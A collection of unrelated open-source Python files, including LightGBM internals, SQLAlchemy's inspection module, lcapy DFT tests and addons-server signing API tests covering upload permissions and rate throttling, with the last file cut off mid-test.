ret.append((data_name, eval_name, val, is_higher_better))
else:
eval_name, val, is_higher_better = feval_ret
ret.append((data_name, eval_name, val, is_higher_better))
return ret
def __inner_predict(self, data_idx):
"""
Predict for training and validation dataset
"""
if data_idx >= self.__num_dataset:
raise ValueError("Data_idx should be smaller than number of dataset")
if self.__inner_predict_buffer[data_idx] is None:
if data_idx == 0:
n_preds = self.train_set.num_data() * self.__num_class
else:
n_preds = self.valid_sets[data_idx - 1].num_data() * self.__num_class
self.__inner_predict_buffer[data_idx] = \
np.array([0.0 for _ in range_(n_preds)], dtype=np.float64, copy=False)
"""avoid to predict many time in one iteration"""
if not self.__is_predicted_cur_iter[data_idx]:
tmp_out_len = ctypes.c_int64(0)
data_ptr = self.__inner_predict_buffer[data_idx].ctypes.data_as(ctypes.POINTER(ctypes.c_double))
_safe_call(_LIB.LGBM_BoosterGetPredict(
self.handle,
ctypes.c_int(data_idx),
ctypes.byref(tmp_out_len),
data_ptr))
if tmp_out_len.value != len(self.__inner_predict_buffer[data_idx]):
raise ValueError("Wrong length of predict results for data %d" % (data_idx))
self.__is_predicted_cur_iter[data_idx] = True
return self.__inner_predict_buffer[data_idx]
def __get_eval_info(self):
"""
Get inner evaluation count and names
"""
if self.__need_reload_eval_info:
self.__need_reload_eval_info = False
out_num_eval = ctypes.c_int(0)
"""Get num of inner evals"""
_safe_call(_LIB.LGBM_BoosterGetEvalCounts(
self.handle,
ctypes.byref(out_num_eval)))
self.__num_inner_eval = out_num_eval.value
if self.__num_inner_eval > 0:
"""Get name of evals"""
tmp_out_len = ctypes.c_int(0)
string_buffers = [ctypes.create_string_buffer(255) for i in range_(self.__num_inner_eval)]
ptr_string_buffers = (ctypes.c_char_p * self.__num_inner_eval)(*map(ctypes.addressof, string_buffers))
_safe_call(_LIB.LGBM_BoosterGetEvalNames(
self.handle,
ctypes.byref(tmp_out_len),
ptr_string_buffers))
if self.__num_inner_eval != tmp_out_len.value:
raise ValueError("Length of eval names doesn't equal with num_evals")
self.__name_inner_eval = \
[string_buffers[i].value.decode() for i in range_(self.__num_inner_eval)]
self.__higher_better_inner_eval = \
[name.startswith(('auc', 'ndcg')) for name in self.__name_inner_eval]
def attr(self, key):
"""
Get attribute string from the Booster.
Parameters
----------
key : str
The key to get attribute from.
Returns
-------
value : str
            The attribute value of the key; returns None if the attribute does not exist.
"""
return self.__attr.get(key, None)
def set_attr(self, **kwargs):
"""
Set the attribute of the Booster.
Parameters
----------
**kwargs
The attributes to set. Setting a value to None deletes an attribute.
"""
for key, value in kwargs.items():
if value is not None:
if not isinstance(value, string_type):
raise ValueError("Set attr only accepts strings")
self.__attr[key] = value
else:
self.__attr.pop(key, None)
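    # A usage sketch: attributes are plain string key/value pairs, and setting a
    # key to None removes it.
    #
    #     booster.set_attr(best_score='0.987')
    #     assert booster.attr('best_score') == '0.987'
    #     booster.set_attr(best_score=None)
    #     assert booster.attr('best_score') is None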
| sightmachine/LightGBM | python-package/lightgbm/basic.py | Python | mit | 67,498 |
#! /usr/bin/env python
import os
import subprocess
import sys
from os.path import join
from pycog.utils import get_here, mkdir_p
#=========================================================================================
# Shared steps
#=========================================================================================
here = get_here(__file__)
base = os.path.abspath(join(here, os.pardir))
paperpath = join(base, 'paper')
mkdir_p(join(paperpath, 'figs', 'plos'))
def call(s):
rv = subprocess.call(s.split())
if rv != 0:
sys.stdout.flush()
print("Something went wrong (return code {}).".format(rv)
+ " We're probably out of memory.")
sys.exit(1)
def figure(fig, n):
call('python ' + join(paperpath, fig + '.py'))
call('mv {} {}'.format(join(paperpath, 'figs', fig + '.eps'),
join(paperpath, 'figs', 'plos', 'fig{}.eps'.format(n))))
#=========================================================================================
figs = {
'fig_rdm': 2,
'fig_structure': 3,
'fig_mante': 4,
'fig_connectivity': 5,
'fig_multisensory': 6,
'fig_romo': 7,
'fig_lee': 8,
'fig_performance': 9
}
for f, n in figs.items():
figure(f, n)
| frsong/pycog | paper/plos.py | Python | mit | 1,305 |
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext as _
from cms.plugin_base import CMSPluginBase
from cms.plugin_pool import plugin_pool
from cms_shiny.models import ShinyAppPluginModel
class ShinyAppPlugin(CMSPluginBase):
model = ShinyAppPluginModel
module = "Lab Plugins"
name = _("Shiny App Plugin")
render_template = "cms_shiny/plugin.html"
def render(self, context, instance, placeholder):
        context.update({'instance': instance})
return context
plugin_pool.register_plugin(ShinyAppPlugin)
| mfcovington/djangocms-shiny-app | cms_shiny/cms_plugins.py | Python | bsd-3-clause | 554 |
# sqlalchemy/inspect.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""The inspection module provides the :func:`.inspect` function,
which delivers runtime information about a wide variety
of SQLAlchemy objects, both within the Core as well as the
ORM.
The :func:`.inspect` function is the entry point to SQLAlchemy's
public API for viewing the configuration and construction
of in-memory objects. Depending on the type of object
passed to :func:`.inspect`, the return value will either be
a related object which provides a known interface, or in many
cases it will return the object itself.
The rationale for :func:`.inspect` is twofold. One is that
it replaces the need to be aware of a large variety of "information
getting" functions in SQLAlchemy, such as :meth:`.Inspector.from_engine`,
:func:`.orm.attributes.instance_state`, :func:`.orm.class_mapper`,
and others. The other is that the return value of :func:`.inspect`
is guaranteed to obey a documented API, thus allowing third party
tools which build on top of SQLAlchemy configurations to be constructed
in a forwards-compatible way.
.. versionadded:: 0.8 The :func:`.inspect` system is introduced
as of version 0.8.
"""
from . import util, exc
_registrars = util.defaultdict(list)
def inspect(subject, raiseerr=True):
"""Produce an inspection object for the given target.
The returned value in some cases may be the
same object as the one given, such as if a
:class:`.orm.Mapper` object is passed. In other
cases, it will be an instance of the registered
inspection type for the given object, such as
if a :class:`.engine.Engine` is passed, an
:class:`.engine.Inspector` object is returned.
:param subject: the subject to be inspected.
:param raiseerr: When ``True``, if the given subject
does not
correspond to a known SQLAlchemy inspected type,
:class:`sqlalchemy.exc.NoInspectionAvailable`
is raised. If ``False``, ``None`` is returned.
"""
type_ = type(subject)
for cls in type_.__mro__:
if cls in _registrars:
reg = _registrars[cls]
if reg is True:
return subject
ret = reg(subject)
if ret is not None:
break
else:
reg = ret = None
if raiseerr and (
reg is None or ret is None
):
raise exc.NoInspectionAvailable(
"No inspection system is "
"available for object of type %s" %
type_)
return ret
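# A usage sketch of the public entry point (the objects are illustrative; the
# return type depends on what is passed in, as described in the docstring above):
#
#     from sqlalchemy import create_engine, inspect
#
#     engine = create_engine("sqlite://")
#     inspector = inspect(engine)      # an Engine yields an Inspector
#     print(inspector.get_table_names())
#
#     # inspect(SomeMappedClass) would yield the class's Mapper instead.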
def _inspects(*types):
def decorate(fn_or_cls):
for type_ in types:
if type_ in _registrars:
raise AssertionError(
"Type %s is already "
"registered" % type_)
_registrars[type_] = fn_or_cls
return fn_or_cls
return decorate
def _self_inspects(cls):
_inspects(cls)(True)
return cls
| michaelgugino/turbo-lister | sqlalchemy/inspection.py | Python | gpl-3.0 | 3,113 |
# Copyright (c) 2017 VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import logging
from vio.pub.msapi.extsys import get_vim_by_id
from vio.pub.vim.drivers.vimsdk import neutron_v2_0
from vio.pub.vim.vimapi.network.OperateNetwork import BaseNet, translate
logger = logging.getLogger(__name__)
class OperateSubnet(BaseNet):
keys_mapping = {"tenantId": "project_id",
"networkId": "network_id",
"ipVersion": "ip_version",
"gaetwayIp": "gateway_ip",
"dnsNameservers": "dns_nameservers",
"hostRoutes": "host_routes",
"allocationPools": "allocation_pools",
"enableDhcp": "is_dhcp_enabled"
}
    def __init__(self, params):
super(OperateSubnet, self).__init__(params)
def _convert(self, subnet):
result = {}
result['status'] = 'ok'
result['id'] = subnet.id
result['networkId'] = subnet.network_id
result['name'] = subnet.name
result['allocationPools'] = subnet.allocation_pools
result['gatewayIp'] = subnet.gateway_ip
result['dnsNameServers'] = subnet.dns_nameservers
result['ipVersion'] = subnet.ip_version
result['enableDhcp'] = subnet.is_dhcp_enabled
result['hostRoutes'] = subnet.host_routes
result['cidr'] = subnet.cidr
return result
def create_subnet(self, vimid, tenantid, body):
vim_info = self.get_vim_info(vimid)
network = self.auth(vim_info)
body = translate(self.keys_mapping, body)
subnet = network.subnet_create(**body)
vim_dict = {"vimName": vim_info['name'], "vimId": vim_info['vimId'], "tenantId": tenantid}
resp = self._convert(subnet)
resp.update(vim_dict)
return resp
def list_subnet(self, vimid, tenantid, subnetid, ignore_missing=False):
vim_info = self.get_vim_info(vimid)
network = self.auth(vim_info)
subnet = network.subnet_get(subnetid, ignore_missing=ignore_missing)
if subnet is None:
return subnet
vim_dict = {"vimName": vim_info['name'], "vimId": vim_info['vimId'], "tenantId": tenantid}
resp = self._convert(subnet)
resp.update(vim_dict)
return resp
def delete_subnet(self, vimid, tenantid, subnetid):
vim_info = self.get_vim_info(vimid)
network = self.auth(vim_info)
return network.subnet_delete(subnetid)
def list_subnets(self, vimid, tenantid, **query):
vim_info = self.get_vim_info(vimid)
network = self.auth(vim_info)
query.update({"project_id": tenantid})
resp = network.subnets_get(**query)
vim_dict = {"vimName": vim_info['name'], "vimId": vim_info['vimId'], "tenantId": tenantid}
subnets = {'subnets': []}
if resp:
for subnet in resp:
subnets['subnets'].append(self._convert(subnet))
subnets.update(vim_dict)
return subnets
| onesafe/multivimdriver-vmware-vio | vio/vio/pub/vim/vimapi/network/OperateSubnet.py | Python | apache-2.0 | 3,441 |
from lcapy import *
import unittest
class LcapyTester(unittest.TestCase):
"""Unit tests for lcapy
"""
def test_DFT(self):
self.assertEqual(nexpr('delta(n)').DFT(), 1, "delta(n)")
self.assertEqual(nexpr('2 * delta(n)').DFT(), 2, "2 * delta(n)")
self.assertEqual(nexpr('1').DFT(), kexpr('N * delta(k)'), "1")
self.assertEqual(nexpr('2').DFT(), kexpr('2 * N * delta(k)'), "2")
self.assertEqual(nexpr('x(n)').DFT(), kexpr('X(k)'), "x(n)")
self.assertEqual(nexpr('2 * x(n)').DFT(), kexpr('2 * X(k)'), "2 * x(n)")
self.assertEqual(nexpr('x(2 * n)').DFT(), kexpr('X(k / 2) / 2'), "x(2 * n)")
self.assertEqual(nexpr('delta(n - 1)').DFT(),
kexpr('exp(-j * 2 * pi * k / N)'), "delta(n - 1)")
self.assertEqual(nexpr('2 * delta(n - 1)').DFT(),
kexpr('2 * exp(-j * 2 * pi * k / N)'), "2 * delta(n - 1)")
self.assertEqual(nexpr('delta(n - 2)').DFT(),
kexpr('exp(-j * 2 * pi * 2 * k / N)'), "delta(n - 2)")
# Temp. hack, ideally should get result 2 * N * delta(k + 1)
self.assertEqual(nexpr('2 * exp(-j * 2 * pi * n / N)').DFT(),
kexpr('2 * N * delta(k + 1 - N)'), "2 * exp(-j * 2 * pi * n / N)")
self.assertEqual(nexpr('x(n-1)').DFT(N=2),
kexpr('X(k)*exp(-j * pi * k)'), "x(n-1)")
def test_IDFT(self):
self.assertEqual(kexpr('X(k)').IDFT(), nexpr('x(n)'), "X(k)")
self.assertEqual(kexpr(1).IDFT(), delta(n), "1")
self.assertEqual(delta(k).IDFT(), nexpr('1 / N'), "delta(k)")
def test_DFT_matrix(self):
X1 = DFTmatrix(4)
X2 = Matrix(((1, 1, 1, 1), (1, -j, -1, j), (1, -1, 1, -1), (1, j, -1, -j)))
X3 = IDFTmatrix(4).conj * 4
self.assertEqual(X1, X2, "DFTmatrix(4)")
self.assertEqual(X3, X2, "IDFTmatrix(4)")
| mph-/lcapy | lcapy/tests/test_dft.py | Python | lgpl-2.1 | 1,983 |
import json
import os
from datetime import datetime, timedelta
from unittest import mock
from django.conf import settings
from django.forms import ValidationError
from django.test.testcases import TransactionTestCase
from django.test.utils import override_settings
from django.urls import reverse
from django.utils import translation
import responses
from freezegun import freeze_time
from olympia import amo
from olympia.access.models import Group, GroupUser
from olympia.activity.models import ActivityLog
from olympia.addons.models import Addon, AddonUser
from olympia.amo.templatetags.jinja_helpers import absolutify
from olympia.amo.tests import (
TestCase,
addon_factory,
create_default_webext_appversion,
developer_factory,
get_random_ip,
reverse_ns,
user_factory,
)
from olympia.api.tests.utils import APIKeyAuthTestMixin
from olympia.blocklist.models import Block
from olympia.files.models import File, FileUpload
from olympia.signing.views import VersionView
from olympia.users.models import (
EmailUserRestriction,
IPNetworkUserRestriction,
UserProfile,
UserRestrictionHistory,
)
from olympia.versions.models import Version
from rest_framework.response import Response
class SigningAPITestMixin(APIKeyAuthTestMixin):
def setUp(self):
self.user = developer_factory(
email='[email protected]', read_dev_agreement=datetime.now()
)
self.api_key = self.create_api_key(self.user, str(self.user.pk) + ':f')
class BaseUploadVersionTestMixin(SigningAPITestMixin):
@classmethod
def setUpTestData(cls):
create_default_webext_appversion()
def setUp(self):
super().setUp()
self.guid = '{2fa4ed95-0317-4c6a-a74c-5f3e3912c1f9}'
addon_factory(
guid=self.guid,
version_kw={'version': '2.1.072'},
users=[self.user],
)
self.view_class = VersionView
def url(self, guid, version, pk=None):
if guid is None:
args = [version]
else:
args = [guid, version]
if pk is not None:
args.append(pk)
return reverse_ns('signing.version', args=args)
def create_version(self, version):
response = self.request('PUT', self.url(self.guid, version), version)
assert response.status_code in [201, 202]
def xpi_filepath(self, guid, version):
return os.path.join(
'src',
'olympia',
'signing',
'fixtures',
f'{guid}-{version}.xpi',
)
def request(
self,
method='PUT',
url=None,
version='3.0',
guid='@upload-version',
filename=None,
channel=None,
extra_kwargs=None,
):
if filename is None:
filename = self.xpi_filepath(guid, version)
if url is None:
url = self.url(guid, version)
with open(filename, 'rb') as upload:
data = {'upload': upload}
if method == 'POST' and version:
data['version'] = version
if channel:
data['channel'] = channel
return getattr(self.client, method.lower())(
url,
data,
HTTP_AUTHORIZATION=self.authorization(),
format='multipart',
**(extra_kwargs or {}),
)
def make_admin(self, user):
admin_group = Group.objects.create(name='Admin', rules='*:*')
GroupUser.objects.create(group=admin_group, user=user)
class TestUploadVersion(BaseUploadVersionTestMixin, TestCase):
def test_not_authenticated(self):
# Use self.client.put so that we don't add the authorization header.
response = self.client.put(self.url(self.guid, '12.5'))
assert response.status_code == 401
def test_addon_does_not_exist(self):
guid = '@create-version'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request('PUT', guid=guid, version='1.0')
assert response.status_code == 201
assert qs.exists()
addon = qs.get()
assert addon.guid == guid
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
assert (
ActivityLog.objects.for_addons(addon)
.filter(action=amo.LOG.CREATE_ADDON.id)
.count()
== 1
)
def test_new_addon_random_slug_unlisted_channel(self):
guid = '@create-webextension'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request('PUT', guid=guid, version='1.0')
assert response.status_code == 201
assert qs.exists()
addon = qs.get()
assert len(addon.slug) == 20
assert 'create' not in addon.slug
def test_user_does_not_own_addon(self):
self.user = UserProfile.objects.create(
read_dev_agreement=datetime.now(), email='[email protected]'
)
self.api_key = self.create_api_key(self.user, 'bar')
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 403
assert response.data['error'] == 'You do not own this addon.'
def test_admin_does_not_own_addon(self):
self.user = UserProfile.objects.create(
read_dev_agreement=datetime.now(), email='[email protected]'
)
self.api_key = self.create_api_key(self.user, 'bar')
self.make_admin(self.user)
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 403
assert response.data['error'] == 'You do not own this addon.'
def test_version_does_not_match_manifest_file(self):
response = self.request('PUT', self.url(self.guid, '2.5'))
assert response.status_code == 400
assert response.data['error'] == ('Version does not match the manifest file.')
def test_version_already_exists(self):
response = self.request(
'PUT', self.url(self.guid, '2.1.072'), version='2.1.072'
)
assert response.status_code == 409
assert response.data['error'] == (
'Version already exists. Latest version is: 2.1.072.'
)
@mock.patch('olympia.devhub.views.Version.from_upload')
def test_no_version_yet(self, from_upload):
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 202
assert 'processed' in response.data
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 200
assert 'processed' in response.data
def test_version_added(self):
assert Addon.objects.get(guid=self.guid).status == amo.STATUS_APPROVED
qs = Version.objects.filter(addon__guid=self.guid, version='3.0')
assert not qs.exists()
existing = Version.objects.filter(addon__guid=self.guid)
assert existing.count() == 1
assert existing[0].channel == amo.RELEASE_CHANNEL_LISTED
response = self.request(
'PUT', self.url(self.guid, '3.0'), extra_kwargs={'REMOTE_ADDR': '127.0.2.1'}
)
assert response.status_code == 202
assert 'processed' in response.data
upload = FileUpload.objects.latest('pk')
assert upload.source == amo.UPLOAD_SOURCE_SIGNING_API
assert upload.user == self.user
assert upload.ip_address == '127.0.2.1'
version = qs.get()
assert version.addon.guid == self.guid
assert version.version == '3.0'
assert version.file.status == amo.STATUS_AWAITING_REVIEW
assert version.addon.status == amo.STATUS_APPROVED
assert version.channel == amo.RELEASE_CHANNEL_LISTED
assert not version.file.is_mozilla_signed_extension
def test_version_already_uploaded(self):
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 202
assert 'processed' in response.data
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 409
assert response.data['error'] == (
'Version already exists. Latest version is: 3.0.'
)
def test_version_failed_review(self):
self.create_version('3.0')
version = Version.objects.get(addon__guid=self.guid, version='3.0')
version.update(reviewed=datetime.today())
version.file.update(reviewed=datetime.today(), status=amo.STATUS_DISABLED)
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 409
assert response.data['error'] == (
'Version already exists. Latest version is: 3.0.'
)
# Verify that you can check the status after upload (#953).
response = self.get(self.url(self.guid, '3.0'))
assert response.status_code == 200
assert 'processed' in response.data
def test_version_added_is_experiment(self):
self.grant_permission(self.user, 'Experiments:submit')
guid = '@experiment-inside-webextension-guid'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/'
'experiment_inside_webextension.xpi',
)
assert response.status_code == 201
assert qs.exists()
addon = qs.get()
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_version_added_is_experiment_reject_no_perm(self):
guid = '@experiment-inside-webextension-guid'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.1',
filename='src/olympia/files/fixtures/files/'
'experiment_inside_webextension.xpi',
)
assert response.status_code == 400
assert response.data['error'] == ('You cannot submit this type of add-on')
def test_mozilla_signed_allowed(self):
guid = '@webextension-guid'
self.grant_permission(self.user, 'SystemAddon:Submit')
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/'
'webextension_signed_already.xpi',
)
assert response.status_code == 201
assert qs.exists()
addon = qs.get()
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
assert latest_version.file.is_mozilla_signed_extension
def test_mozilla_signed_not_allowed(self):
guid = '@webextension-guid'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/'
'webextension_signed_already.xpi',
)
assert response.status_code == 400
assert response.data['error'] == (
'You cannot submit a Mozilla Signed Extension'
)
def test_restricted_guid_addon_allowed_because_signed_and_has_permission(self):
guid = '[email protected]'
self.grant_permission(self.user, 'SystemAddon:Submit')
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/mozilla_guid_signed.xpi',
)
assert response.status_code == 201
assert qs.exists()
addon = qs.get()
assert addon.has_author(self.user)
assert addon.status == amo.STATUS_NULL
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_restricted_guid_addon_not_allowed_because_not_signed(self):
guid = '[email protected]'
self.grant_permission(self.user, 'SystemAddon:Submit')
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/mozilla_guid.xpi',
)
assert response.status_code == 400
assert response.data['error'] == (
'Add-ons using an ID ending with this suffix need to be signed with '
'privileged certificate before being submitted'
)
def test_restricted_guid_addon_not_allowed_because_lacking_permission(self):
guid = '[email protected]'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request(
'PUT',
guid=guid,
version='0.1',
filename='src/olympia/files/fixtures/files/mozilla_guid.xpi',
)
assert response.status_code == 400
assert response.data['error'] == (
'You cannot submit an add-on using an ID ending with this suffix'
)
def test_restricted_guid_addon_update_allowed(self):
"""Updates to restricted IDs are allowed from anyone."""
guid = '[email protected]'
self.user.update(email='[email protected]')
orig_addon = addon_factory(
guid='[email protected]',
version_kw={'channel': amo.RELEASE_CHANNEL_UNLISTED},
)
AddonUser.objects.create(addon=orig_addon, user=self.user)
response = self.request(
'PUT',
guid=guid,
version='0.0.1',
filename='src/olympia/files/fixtures/files/mozilla_guid.xpi',
)
assert response.status_code == 202
addon = Addon.unfiltered.filter(guid=guid).get()
assert addon.versions.count() == 2
latest_version = addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert latest_version
assert latest_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_invalid_version_response_code(self):
# This raises an error in parse_addon which is not covered by
# an exception handler.
response = self.request(
'PUT',
self.url(self.guid, '1.0'),
guid='@create-webextension-invalid-version',
version='1.0',
)
assert response.status_code == 400
def test_raises_response_code(self):
# A check that any bare error in handle_upload will return a 400.
with mock.patch('olympia.signing.views.devhub_handle_upload') as patch:
patch.side_effect = ValidationError(message='some error')
response = self.request('PUT', self.url(self.guid, '1.0'))
assert response.status_code == 400
def test_no_version_upload_for_admin_disabled_addon(self):
addon = Addon.objects.get(guid=self.guid)
addon.update(status=amo.STATUS_DISABLED)
response = self.request('PUT', self.url(self.guid, '3.0'), version='3.0')
assert response.status_code == 400
error_msg = 'cannot add versions to an addon that has status: %s.' % (
amo.STATUS_CHOICES_ADDON[amo.STATUS_DISABLED]
)
assert error_msg in response.data['error']
def test_no_listed_version_upload_for_user_disabled_addon(self):
addon = Addon.objects.get(guid=self.guid)
addon.update(disabled_by_user=True)
assert not addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
response = self.request('PUT', self.url(self.guid, '3.0'), version='3.0')
assert response.status_code == 400
error_msg = 'cannot add listed versions to an addon set to "Invisible"'
assert error_msg in response.data['error']
response = self.request(
'PUT', self.url(self.guid, '3.0'), version='3.0', channel='listed'
)
assert response.status_code == 400
assert error_msg in response.data['error']
response = self.request(
'PUT', self.url(self.guid, '3.0'), version='3.0', channel='unlisted'
)
assert response.status_code == 202
assert addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
def test_channel_ignored_for_new_addon(self):
guid = '@create-version'
qs = Addon.unfiltered.filter(guid=guid)
assert not qs.exists()
response = self.request('PUT', guid=guid, version='1.0', channel='listed')
assert response.status_code == 201
addon = qs.get()
assert addon.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
def test_no_channel_selects_last_channel(self):
addon = Addon.objects.get(guid=self.guid)
assert addon.status == amo.STATUS_APPROVED
assert addon.versions.count() == 1
assert addon.versions.all()[0].channel == amo.RELEASE_CHANNEL_LISTED
response = self.request('PUT', self.url(self.guid, '3.0'))
assert response.status_code == 202, response.data['error']
assert 'processed' in response.data
new_version = addon.versions.latest()
assert new_version.channel == amo.RELEASE_CHANNEL_LISTED
new_version.update(channel=amo.RELEASE_CHANNEL_UNLISTED)
response = self.request(
'PUT', self.url(self.guid, '4.0-beta1'), version='4.0-beta1'
)
assert response.status_code == 202, response.data['error']
assert 'processed' in response.data
third_version = addon.versions.latest()
assert third_version.channel == amo.RELEASE_CHANNEL_UNLISTED
def test_unlisted_channel_for_listed_addon(self):
addon = Addon.objects.get(guid=self.guid)
assert addon.status == amo.STATUS_APPROVED
assert addon.versions.count() == 1
assert addon.versions.all()[0].channel == amo.RELEASE_CHANNEL_LISTED
response = self.request('PUT', self.url(self.guid, '3.0'), channel='unlisted')
assert response.status_code == 202, response.data['error']
assert 'processed' in response.data
assert addon.versions.latest().channel == amo.RELEASE_CHANNEL_UNLISTED
def test_listed_channel_for_complete_listed_addon(self):
addon = Addon.objects.get(guid=self.guid)
assert addon.status == amo.STATUS_APPROVED
assert addon.versions.count() == 1
assert addon.has_complete_metadata()
response = self.request('PUT', self.url(self.guid, '3.0'), channel='listed')
assert response.status_code == 202, response.data['error']
assert 'processed' in response.data
assert addon.versions.latest().channel == amo.RELEASE_CHANNEL_LISTED
def test_listed_channel_fails_for_incomplete_addon(self):
addon = Addon.objects.get(guid=self.guid)
assert addon.status == amo.STATUS_APPROVED
assert addon.versions.count() == 1
addon.current_version.update(license=None) # Make addon incomplete.
addon.versions.latest().update(channel=amo.RELEASE_CHANNEL_UNLISTED)
assert not addon.has_complete_metadata(has_listed_versions=True)
response = self.request('PUT', self.url(self.guid, '3.0'), channel='listed')
assert response.status_code == 400
error_msg = 'You cannot add a listed version to this addon via the API'
assert error_msg in response.data['error']
def test_invalid_guid_in_package_post(self):
Addon.objects.all().delete()
response = self.request(
'POST',
url=reverse_ns('signing.version'),
version='1.0',
filename='src/olympia/files/fixtures/files/invalid_guid.xpi',
)
assert response.status_code == 400
assert response.data == {'error': 'Invalid Add-on ID in URL or package'}
assert not Addon.unfiltered.filter(guid='this_guid_is_invalid').exists()
assert not Addon.objects.exists()
def _test_throttling_verb_ip_burst(self, verb, url, expected_status=201):
        # Bulk-create a bunch of users: we need a different user every time so
        # that we specifically exercise the IP throttling.
users = [
UserProfile(username='bûlk%d' % i, email='bulk%[email protected]' % i)
for i in range(0, 6)
]
UserProfile.objects.bulk_create(users)
users = UserProfile.objects.filter(email__startswith='bulk')
with freeze_time('2019-04-08 15:16:23.42') as frozen_time:
for user in users:
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=user,
remote_addr='63.245.208.194',
)
# At this point we should be throttled since we're using the same
# IP. (we're still inside the frozen time context).
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '63.245.208.194',
'HTTP_X_FORWARDED_FOR': f'63.245.208.194, {get_random_ip()}',
},
)
assert response.status_code == 429, response.content
# 'Burst' throttling is 1 minute, so 61 seconds later we should be
# allowed again.
frozen_time.tick(delta=timedelta(seconds=61))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '63.245.208.194',
'HTTP_X_FORWARDED_FOR': f'63.245.208.194, {get_random_ip()}',
},
)
assert response.status_code == expected_status
def _test_throttling_verb_ip_hourly(self, verb, url, expected_status=201):
        # Bulk-create a bunch of users: we need a different user every time so
        # that we specifically exercise the IP throttling.
users = [
UserProfile(username='bûlk%d' % i, email='bulk%[email protected]' % i)
for i in range(0, 50)
]
UserProfile.objects.bulk_create(users)
users = UserProfile.objects.filter(email__startswith='bulk')
with freeze_time('2019-04-08 15:16:23.42') as frozen_time:
for user in users:
# Make the user different every time so that we test the ip
# throttling.
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=user,
remote_addr='63.245.208.194',
)
# At this point we should be throttled since we're using the same
# IP. (we're still inside the frozen time context).
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '63.245.208.194',
'HTTP_X_FORWARDED_FOR': f'63.245.208.194, {get_random_ip()}',
},
)
assert response.status_code == 429
# One minute later, past the 'burst' throttling period, we're still
# blocked by the 'hourly' limit.
frozen_time.tick(delta=timedelta(seconds=61))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '63.245.208.194',
'HTTP_X_FORWARDED_FOR': f'63.245.208.194, {get_random_ip()}',
},
)
assert response.status_code == 429
# 'hourly' throttling is 1 hour, so 3601 seconds later we should
# be allowed again.
frozen_time.tick(delta=timedelta(seconds=3601))
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
'REMOTE_ADDR': '63.245.208.194',
'HTTP_X_FORWARDED_FOR': f'63.245.208.194, {get_random_ip()}',
},
)
assert response.status_code == expected_status
def _test_throttling_verb_user_burst(self, verb, url, expected_status=201):
with freeze_time('2019-04-08 15:16:23.42') as frozen_time:
for x in range(0, 6):
# Make the IP different every time so that we test the user
# throttling.
self._add_fake_throttling_action(
view_class=self.view_class,
url=url,
user=self.user,
remote_addr=get_random_ip(),
)
# At this point we should be throttled since we're using the same
# user. (we're still inside the frozen time context).
response = self.request(
verb,
url=url,
guid='@create-webextension',
version='1.0',
extra_kwargs={
